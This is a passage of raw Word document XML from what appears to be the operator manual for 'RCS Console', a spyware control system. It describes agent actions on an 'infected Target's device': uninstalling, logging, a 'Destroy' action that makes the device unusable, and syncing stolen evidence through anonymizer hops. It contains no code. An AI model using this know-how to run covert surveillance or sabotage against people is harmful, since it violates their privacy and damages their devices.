                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00E14BDC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="945">
                <v:shape id="_x0000_i1045" type="#_x0000_t75" style="width:128.25pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId120" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1045" DrawAspect="Content" ObjectID="_1446455260" r:id="rId121"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00E14BDC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Uninstall</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00657193" w:rsidP="00657193">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Uninstall </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction removes the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">gent from the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected Target’s devices</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">All </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>evidences that still need to be synchronized are removed</w:t>
            </w:r>
            <w:r w:rsidRPr="00657193">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00F95A69" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="930">
                <v:shape id="_x0000_i1046" type="#_x0000_t75" style="width:128.25pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId122" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1046" DrawAspect="Content" ObjectID="_1446455261" r:id="rId123"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00E14BDC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Log</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00F270AB" w:rsidP="00F270AB">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F270AB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Log </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00F270AB">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>writes a custom string within the Console.</w:t>
            </w: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RPr="005701FD" w:rsidTr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="005701FD" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE55D0" w:rsidRPr="006172B5" w:rsidTr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="006172B5" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="006172B5" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="006172B5" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE55D0" w:rsidTr="00E14BDC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00F95A69" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="930">
                <v:shape id="_x0000_i1047" type="#_x0000_t75" style="width:128.25pt;height:47.25pt" o:ole="">
                  <v:imagedata r:id="rId124" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1047" DrawAspect="Content" ObjectID="_1446455262" r:id="rId125"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00E14BDC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Destroy</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BE55D0" w:rsidRPr="00671455" w:rsidRDefault="00E82461" w:rsidP="00E82461">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E82461">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Destroy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00E82461">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">makes the infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00E82461">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>temporarily or permanently unusable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="003D3393">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00BE55D0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The images below show the pop-up windows for the creation of all 5 different types of Desktop Actions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE55D0" w:rsidRDefault="00BE55D0" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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F11436" w:rsidTr="00145C50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B20850" w:rsidRDefault="00B20850" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B20850" w:rsidRDefault="0010013A" w:rsidP="00B20850">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.16</w:t>
            </w:r>
            <w:r w:rsidR="00B20850">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B20850" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00B20850">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00B20850" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00B20850">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00B20850" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00B20850">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00B20850" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00A52C9B" w:rsidRDefault="00B20850" w:rsidP="00B20850">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(Synchronize)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1102" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:252.75pt;z-index:251741184;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId126" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1102" DrawAspect="Content" ObjectID="_1446455359" r:id="rId127"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11436" w:rsidRDefault="00F11436" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="002954E4" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="005619DE" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the address of the host - chosen from the list of available Anonymizers - that will be used as first hop from infected Target’s device, for data synchronization.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Bandwidth</w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="005619DE" w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the maximum amount of bandwidth that the Agent is allowed to use from Target’s connection.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F11436" w:rsidRPr="00B20850" w:rsidRDefault="00F11436" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B20850">
              <w:rPr>
                <w:b/>
